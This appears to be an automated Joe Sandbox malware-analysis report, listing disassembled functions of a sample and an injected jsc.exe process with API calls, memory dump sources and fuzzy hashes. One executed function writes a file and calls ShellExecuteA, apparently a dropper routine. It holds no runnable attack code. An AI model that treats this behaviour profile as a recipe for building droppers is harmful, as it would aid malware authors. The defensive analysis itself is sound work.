Part of subcall function 00007FF6C74FCA20: VirtualQuery.KERNEL32 ref: 00007FF6C74FCA52

RaiseFailFastException.KERNEL32 ref: 00007FF6C74F5300

Strings

, xrefs: 00007FF6C74F5314

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-3916222277
Opcode ID: d30b0a18a6afce2b94509458ad84adfff122d9b0d455f078454af0d3301c861e
Instruction ID: 103ca38116d3ded3ae64857d94f859b504ba81cfb828ed4857e24ae88f305bf4
Opcode Fuzzy Hash: d30b0a18a6afce2b94509458ad84adfff122d9b0d455f078454af0d3301c861e
Instruction Fuzzy Hash: 03116D72A08B818AE760EF25B4411DAB761FB457B4F544339E6BD4BBD6CF78D4428700

Function 00007FF6C7526730 Relevance: 7.6, APIs: 6, Instructions: 135COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6C75267DE
LeaveCriticalSection.KERNEL32 ref: 00007FF6C7526824
EnterCriticalSection.KERNEL32 ref: 00007FF6C75268F6
LeaveCriticalSection.KERNEL32 ref: 00007FF6C7526917
EnterCriticalSection.KERNEL32 ref: 00007FF6C752695F
LeaveCriticalSection.KERNEL32 ref: 00007FF6C7526980

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2132fd56b97cbdc38263b4cf544131be2a3168c9d801f92db925f5755b408808
Instruction ID: 3989d20b95737cef787b8212d2d453b4519de22f1294dd6bc08e80c863529423
Opcode Fuzzy Hash: 2132fd56b97cbdc38263b4cf544131be2a3168c9d801f92db925f5755b408808
Instruction Fuzzy Hash: A1615C21A08B8285EE509F16E8853B563A9EF84BDAFA50031D9CDD77A6DF3CE485D340

Function 00007FF6C7521A50 Relevance: 7.6, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6C7521AEA
LeaveCriticalSection.KERNEL32 ref: 00007FF6C7521B2F

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 02568b6387077dc69a86313b117f7d2164c3133072cd7a43a51363447fb75002
Instruction ID: 99a69df7bc1c11bf8376185231dbf04c0bb9a3fc546d2783ccd073b133f75a4b
Opcode Fuzzy Hash: 02568b6387077dc69a86313b117f7d2164c3133072cd7a43a51363447fb75002
Instruction Fuzzy Hash: 00514935A0CB8281EA609F16E8853BA73A8FF847DAF950036D9CDD3665DF3CE4949740

Function 00007FF6C74F3540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF6C74F35E0
RaiseFailFastException.KERNEL32 ref: 00007FF6C74F36E9
RaiseFailFastException.KERNEL32 ref: 00007FF6C74F3726

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF6C74F35CA

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: 58b8172ba6b01771502ef75aede6fef8a2add92a778c92d7e4719fbc0e8cd755
Instruction ID: 3b50944223e93db945848f38e5e43ddefe49a38a66f8c36af62144da33b31442
Opcode Fuzzy Hash: 58b8172ba6b01771502ef75aede6fef8a2add92a778c92d7e4719fbc0e8cd755
Instruction Fuzzy Hash: 7151A122B09A4281FE649F16E4503B82392EF48BD6F45D132EADEC77A1DF3CE4958700

Function 00007FF6C7530570 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00007FF6C750AF49), ref: 00007FF6C75305EB
SwitchToThread.KERNEL32(?,?,?,00007FF6C750AF49), ref: 00007FF6C7530692
SwitchToThread.KERNEL32(?,?,?,00007FF6C750AF49), ref: 00007FF6C75306A8

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
Instruction ID: 657d31c583eabbd85234f84c1ab2e4fda732aeeb59745c407d46b4121c467ba2
Opcode Fuzzy Hash: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
Instruction Fuzzy Hash: F9416E32B09F8685EF648F25D04067D7292EB41B96F94913ADA8EC77E9DE3CE480C740

Function 00007FF6C7530E70 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,00007FF6C750E7B5,?,?,0000000100000001,00007FF6C751CA48), ref: 00007FF6C7530F49
DebugBreak.KERNEL32(?,?,?,00007FF6C750E7B5,?,?,0000000100000001,00007FF6C751CA48), ref: 00007FF6C7530F66
DebugBreak.KERNEL32(?,?,?,00007FF6C750E7B5,?,?,0000000100000001,00007FF6C751CA48), ref: 00007FF6C7530F81
DebugBreak.KERNEL32(?,?,?,00007FF6C750E7B5,?,?,0000000100000001,00007FF6C751CA48), ref: 00007FF6C7530F9A

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
Instruction ID: b21b78e8eb35a3904138485ea92fab3e0d640ed32dc2d6ea661645b111aa06e0
Opcode Fuzzy Hash: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
Instruction Fuzzy Hash: 9741B521A0DB8686FA619F11918037D67A5FF44B9AF995538DECC873A5CF7CE482C340

Function 00007FF6C751F280 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,00007FF6C751F4A1,?,?,00000000,00007FF6C750BF0E), ref: 00007FF6C751F339
DebugBreak.KERNEL32(?,?,?,?,00007FF6C751F4A1,?,?,00000000,00007FF6C750BF0E), ref: 00007FF6C751F356
DebugBreak.KERNEL32(?,?,?,?,00007FF6C751F4A1,?,?,00000000,00007FF6C750BF0E), ref: 00007FF6C751F376
DebugBreak.KERNEL32(?,?,?,?,00007FF6C751F4A1,?,?,00000000,00007FF6C750BF0E), ref: 00007FF6C751F399

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 635ce585bf3a4f0bf20d974f52a543c0c9b1f8e2929b19421a4e6c4d29f9ec80
Instruction ID: a7c2544c3e5fb7f243ce345bf99cc23c641e16e07bfe78d73c6a6827dc3e9c98
Opcode Fuzzy Hash: 635ce585bf3a4f0bf20d974f52a543c0c9b1f8e2929b19421a4e6c4d29f9ec80
Instruction Fuzzy Hash: 05318E22A0AB8683EA649F55E0402BDA6A4FF44B9AF984135DACD876D5CF7DE841C340

Function 00007FF6C751BE48 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF6C751BE5B
DebugBreak.KERNEL32 ref: 00007FF6C751BE78
DebugBreak.KERNEL32 ref: 00007FF6C751BE98
DebugBreak.KERNEL32 ref: 00007FF6C751BEBB

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 97611ec3983eeaaa4fb8dec5fef651d75c79b6fc3a7eb09739076e1ad2787dda
Instruction ID: c32dad92427d105786586fa73c39a06e37b00a1a7edc85a72c253d978cd54797
Opcode Fuzzy Hash: 97611ec3983eeaaa4fb8dec5fef651d75c79b6fc3a7eb09739076e1ad2787dda
Instruction Fuzzy Hash: BE115461E4EA8243F615AF5191001BDA361BF40BD6F45C039EACD97BEACF6CE8518390

Function 00007FF6C74FB520 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C74F53F1), ref: 00007FF6C74FB554
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C74F53F1), ref: 00007FF6C74FB55E
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C74F53F1), ref: 00007FF6C74FB57D
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C74F53F1), ref: 00007FF6C74FB591

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
Instruction ID: 5190de1aa5f4522ad51a83c6c48a9e20cadb2e56a62ecfa64b81b2a4aec1d777
Opcode Fuzzy Hash: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
Instruction Fuzzy Hash: DB115231A1C69586DB244F3AF44012AB265FB8579AF145139FACEC7B95CF3CD800CB44

Function 00007FF6C755C658 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C755B963), ref: 00007FF6C755C6A8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C755B963), ref: 00007FF6C755C6E9

Strings

csm, xrefs: 00007FF6C755C6D6

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
Instruction ID: 7ce2fa74c663d3f9b35e2c8bd72107ca0219d4654cd0c8b4ce2e89979cea73b7
Opcode Fuzzy Hash: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
Instruction Fuzzy Hash: AB113D36618B8182EB618F19F44026977E4FB88B89F584232EECD4B768EF3CD551CB00

Function 00007FF6C74FD050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF6C74FC313,?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FD08B
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF6C74FC313,?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FD0C8

Strings

HeapVerify, xrefs: 00007FF6C74FD05F

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: _stricmpstrtoull
String ID: HeapVerify
API String ID: 4031153986-2674988305
Opcode ID: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
Instruction ID: 040561dec63e6afa234eee3fcc3cc61b7177affc374fb8ee5ba325573385a205
Opcode Fuzzy Hash: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
Instruction Fuzzy Hash: 27019271A09A41CDEB50AF12E89107977A0FB58781F44D031DACD83B49CF3CD446DB00

Function 00007FF6C7523292 Relevance: 5.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6C75232ED
LeaveCriticalSection.KERNEL32 ref: 00007FF6C752333E
EnterCriticalSection.KERNEL32 ref: 00007FF6C7523374
LeaveCriticalSection.KERNEL32 ref: 00007FF6C752338F

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2ea1e0f7031de79f27fdcf692f0c25295c45d7f2261d43e7c88d82e6c517e849
Instruction ID: f31e69d26665035a95ce4b125dbc43f0ed2d05a0d8de533e2c1beceb10428f1a
Opcode Fuzzy Hash: 2ea1e0f7031de79f27fdcf692f0c25295c45d7f2261d43e7c88d82e6c517e849
Instruction Fuzzy Hash: 15419121A0C68281EE148F16E8993787395EF547DAF940532D9DEC76E5CF3CE688D340

Function 00007FF6C7514020 Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00007FF6C751419F,?,?,?,00007FF6C7521E7B), ref: 00007FF6C751406A
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF6C751419F,?,?,?,00007FF6C7521E7B), ref: 00007FF6C75140AC
EnterCriticalSection.KERNEL32(?,?,00000000,00007FF6C751419F,?,?,?,00007FF6C7521E7B), ref: 00007FF6C75140D7
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF6C751419F,?,?,?,00007FF6C7521E7B), ref: 00007FF6C75140F8

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
Instruction ID: df00e87aece45c86172a4ddbf11a0ec9aeea33c54d830e2b452a2c553cf1bbb3
Opcode Fuzzy Hash: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
Instruction Fuzzy Hash: D0215E21E0894282EE108F2AE8853B42359EF107EAF990232D5EDC65E9DF7CE599D341

Analysis Process: jsc.exePID: 5100, Parent PID: 6848COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	94.7%
Signature Coverage:	5.6%
Total number of Nodes:	1027
Total number of Limit Nodes:	19

Executed Functions

Function 0317CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

w, xrefs: 0317C289
d, xrefs: 0317C294

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
Opcode ID: f1e9c1967ac87e0861a9bc8932c22874fb281dd8f9a60942c3e436a3ab8e9558
Instruction ID: 9ab1d1044267854cf6735e25e68860297c313f65506ca0087ae097d12e16c68a
Opcode Fuzzy Hash: f1e9c1967ac87e0861a9bc8932c22874fb281dd8f9a60942c3e436a3ab8e9558
Instruction Fuzzy Hash: 00C16A65A4C340AFCB39DA648C08B7ABB7C6F4DB50F4D80D6F552CA1F2DB218854C6D2

Function 03178550 Relevance: 20.0, APIs: 13, Instructions: 510COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03177FD4

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7c0e0b1b93f2f2c10bb10a7fca4a2ef7092cd5fe87b5474afd2e8a79113ea784
Instruction ID: 944cc143e699da9e0afa30e733ffd479c93706f71eb1f7ffaafb3c660eda4fd7
Opcode Fuzzy Hash: 7c0e0b1b93f2f2c10bb10a7fca4a2ef7092cd5fe87b5474afd2e8a79113ea784
Instruction Fuzzy Hash: 5BF14C2195C3409FCB3AD7288C0F77ABBB85F5E671F4D06D6E465C60E2E7648845C223

Function 0040108C Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 221
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 00401106
strcmp.MSVCRT ref: 004011B8
strcpy.MSVCRT(?,00000000), ref: 00401206
getenv.MSVCRT ref: 00401243
sprintf.MSVCRT ref: 0040129B
fopen.MSVCRT ref: 004012B0
fwrite.MSVCRT ref: 00401315
fclose.MSVCRT ref: 00401324

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 0040137C

Strings

=OKQ, xrefs: 004010AE
=OKQ, xrefs: 004010DE
%s\%s, xrefs: 0040128E, 00401293
=OKQ, xrefs: 004010C6

Memory Dump Source

Source File: 00000005.00000002.1894631200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1894631200.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_jsc.jbxd

Similarity

API ID: memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s$=OKQ$=OKQ$=OKQ
API String ID: 1891165703-2540351529
Opcode ID: ef5fdc7b51384aae5ba9dd46e0a3b4fcfbc54184348bafa20e1948dc8af09b12
Instruction ID: 321151c2d241c1d5dbc8c9540c5c70c8aea49a67c548484787ef71c5015b9d55
Opcode Fuzzy Hash: ef5fdc7b51384aae5ba9dd46e0a3b4fcfbc54184348bafa20e1948dc8af09b12
Instruction Fuzzy Hash: 58810AF0E002089BEB54DBACCD41B9D77A9EB49304F14417EE50AFB381E6399E44CB69

Function 0315CE90 Relevance: 16.2, APIs: 10, Instructions: 1204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1895866714.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3150000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113b8def5a38b494940fd4d60c5f9d3b3d78e04db89df8a080c54ff559df46ac
Instruction ID: f3f266ba7c8a2b8e44ee4860d1afdd8411c827c2aa4b9dda3f1137fb5be41156
Opcode Fuzzy Hash: 113b8def5a38b494940fd4d60c5f9d3b3d78e04db89df8a080c54ff559df46ac
Instruction Fuzzy Hash: 36A26A71909380CFC735DF18D8447AAFBE5AFC9318F0D4999F8A897292D335A8548B93

Function 0040118D Relevance: 9.1, APIs: 6, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 004011B8
strcpy.MSVCRT(?,00000000), ref: 00401206
getenv.MSVCRT ref: 00401243
sprintf.MSVCRT ref: 0040129B
